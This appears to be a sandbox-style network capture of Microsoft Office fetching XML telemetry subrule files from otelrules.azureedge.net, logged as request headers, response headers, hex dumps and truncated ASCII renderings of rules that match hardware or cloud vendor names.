                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:06 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 87508d14-a01e-0098-0ad5-338556000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153706Z-174f7845968nnm4mhC1EWR1rn4000000052000000000fgmy
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        78192.168.2.44983113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:06 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 2302a2aa-d01e-0017-0cd5-33b035000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153706Z-174f7845968vwdr7hC1EWRsh3w000000051g00000000gfzm
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        79192.168.2.44983313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:06 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 87508d13-a01e-0098-09d5-338556000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153706Z-174f7845968ljs8phC1EWRe6en00000004w000000000re5g
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        80192.168.2.44983213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:06 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 432
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 9a2be61a-a01e-0053-3cd5-338603000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153706Z-174f7845968n2hr8hC1EWR9cag00000004rg00000000gz8a
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        81192.168.2.44983513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 7cd11897-e01e-0052-7bd5-33d9df000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153707Z-174f7845968jrjrxhC1EWRmmrs000000058g00000000f1yz
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        82192.168.2.44983813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                                                        x-ms-request-id: b85e0199-b01e-0098-60d5-33cead000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153707Z-174f7845968cdxdrhC1EWRg0en00000004z000000000tubd
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        83192.168.2.44983913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 63eb2b55-501e-00a3-51d5-33c0f2000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153707Z-174f7845968j9dchhC1EWRfe7400000004yg00000000edgf
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        84192.168.2.44983713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 405
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 78b03aef-101e-000b-52d5-335e5c000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153707Z-174f7845968ljs8phC1EWRe6en00000004z000000000e6q8
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        85192.168.2.44983613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                                        x-ms-request-id: c056ec92-701e-001e-03d5-33f5e6000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153707Z-174f7845968t42glhC1EWRa36w00000004xg000000005f6c
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        86192.168.2.44984213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
